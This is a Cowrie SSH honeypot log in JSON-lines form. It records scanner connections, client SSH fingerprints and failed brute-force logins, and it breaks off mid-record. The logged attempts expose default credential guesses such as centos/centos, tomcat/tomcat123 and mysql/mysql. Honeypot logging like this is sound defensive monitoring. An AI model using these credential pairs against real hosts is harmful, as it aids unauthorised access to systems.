{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:23:48.438896Z","src_ip":"185.93.89.7","session":"179241bcfa96"}
{"eventid":"cowrie.login.failed","username":"index","password":"test","message":"login attempt [index/test] failed","sensor":"my-vps","timestamp":"2025-08-28T09:23:48.477633Z","src_ip":"185.93.89.7","session":"179241bcfa96"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:23:49.517473Z","src_ip":"185.93.89.7","session":"179241bcfa96"}
{"eventid":"cowrie.session.closed","duration":31.289727210998535,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:24:03.189936Z","src_ip":"60.248.136.162","session":"9735d5cd18c3"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54064,"dst_ip":"1.2.3.4","dst_port":22,"session":"234674e5c9cc","protocol":"ssh","message":"New connection: 51.79.164.132:54064 (1.2.3.4:22) [session: 234674e5c9cc]","sensor":"my-vps","timestamp":"2025-08-28T09:24:09.189415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:24:09.281252Z","src_ip":"51.79.164.132","session":"234674e5c9cc"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":41917,"dst_ip":"1.2.3.4","dst_port":22,"session":"46144ec4bf60","protocol":"ssh","message":"New connection: 80.94.95.15:41917 (1.2.3.4:22) [session: 46144ec4bf60]","sensor":"my-vps","timestamp":"2025-08-28T09:24:09.657835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:24:09.658816Z","src_ip":"80.94.95.15","session":"46144ec4bf60"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:24:09.760000Z","src_ip":"80.94.95.15","session":"46144ec4bf60"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:24:09.774883Z","src_ip":"51.79.164.132","session":"234674e5c9cc"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-28T09:24:11.274041Z","src_ip":"51.79.164.132","session":"234674e5c9cc"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":43076,"dst_ip":"1.2.3.4","dst_port":22,"session":"78b38c2c408b","protocol":"ssh","message":"New connection: 185.93.89.7:43076 (1.2.3.4:22) [session: 78b38c2c408b]","sensor":"my-vps","timestamp":"2025-08-28T09:24:12.764428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:24:12.767857Z","src_ip":"185.93.89.7","session":"78b38c2c408b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:24:12.782769Z","src_ip":"185.93.89.7","session":"78b38c2c408b"}
{"eventid":"cowrie.login.failed","username":"index","password":"test123","message":"login attempt [index/test123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:24:12.837815Z","src_ip":"185.93.89.7","session":"78b38c2c408b"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:24:12.888913Z","src_ip":"51.79.164.132","session":"234674e5c9cc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:24:13.954413Z","src_ip":"185.93.89.7","session":"78b38c2c408b"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:24:19.232177Z","src_ip":"80.94.95.15","session":"46144ec4bf60"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":37388,"dst_ip":"1.2.3.4","dst_port":22,"session":"a135d9e991d5","protocol":"ssh","message":"New connection: 51.79.164.132:37388 (1.2.3.4:22) [session: a135d9e991d5]","sensor":"my-vps","timestamp":"2025-08-28T09:24:35.282079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:24:35.405374Z","src_ip":"51.79.164.132","session":"a135d9e991d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:24:36.016985Z","src_ip":"51.79.164.132","session":"a135d9e991d5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":45390,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bfd7e6f571a","protocol":"ssh","message":"New connection: 185.93.89.7:45390 (1.2.3.4:22) [session: 7bfd7e6f571a]","sensor":"my-vps","timestamp":"2025-08-28T09:24:36.567367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:24:36.682710Z","src_ip":"185.93.89.7","session":"7bfd7e6f571a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:24:36.683391Z","src_ip":"185.93.89.7","session":"7bfd7e6f571a"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:24:37.373895Z","src_ip":"51.79.164.132","session":"a135d9e991d5"}
{"eventid":"cowrie.login.failed","username":"index","password":"88888888","message":"login attempt [index/88888888] failed","sensor":"my-vps","timestamp":"2025-08-28T09:24:37.688018Z","src_ip":"185.93.89.7","session":"7bfd7e6f571a"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:24:38.889552Z","src_ip":"51.79.164.132","session":"a135d9e991d5"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:24:39.585512Z","src_ip":"185.93.89.7","session":"7bfd7e6f571a"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":46524,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b6d25e0d66f","protocol":"ssh","message":"New connection: 51.79.164.132:46524 (1.2.3.4:22) [session: 0b6d25e0d66f]","sensor":"my-vps","timestamp":"2025-08-28T09:25:01.900444Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":59980,"dst_ip":"1.2.3.4","dst_port":22,"session":"499f83d0231a","protocol":"ssh","message":"New connection: 185.93.89.7:59980 (1.2.3.4:22) [session: 499f83d0231a]","sensor":"my-vps","timestamp":"2025-08-28T09:25:02.163216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:25:02.164394Z","src_ip":"185.93.89.7","session":"499f83d0231a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:25:02.184005Z","src_ip":"185.93.89.7","session":"499f83d0231a"}
{"eventid":"cowrie.login.failed","username":"index","password":"123","message":"login attempt [index/123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:25:02.222136Z","src_ip":"185.93.89.7","session":"499f83d0231a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:25:02.287905Z","src_ip":"51.79.164.132","session":"0b6d25e0d66f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:25:02.288933Z","src_ip":"51.79.164.132","session":"0b6d25e0d66f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:25:03.248951Z","src_ip":"185.93.89.7","session":"499f83d0231a"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-28T09:25:06.936619Z","src_ip":"51.79.164.132","session":"0b6d25e0d66f"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:25:08.844810Z","src_ip":"51.79.164.132","session":"0b6d25e0d66f"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54206,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee8a31b85d4e","protocol":"ssh","message":"New connection: 51.79.164.132:54206 (1.2.3.4:22) [session: ee8a31b85d4e]","sensor":"my-vps","timestamp":"2025-08-28T09:25:29.520446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:25:29.940317Z","src_ip":"51.79.164.132","session":"ee8a31b85d4e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:25:29.941639Z","src_ip":"51.79.164.132","session":"ee8a31b85d4e"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":37476,"dst_ip":"1.2.3.4","dst_port":22,"session":"d528e8cd1941","protocol":"ssh","message":"New connection: 185.93.89.7:37476 (1.2.3.4:22) [session: d528e8cd1941]","sensor":"my-vps","timestamp":"2025-08-28T09:25:30.648572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:25:30.655317Z","src_ip":"185.93.89.7","session":"d528e8cd1941"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha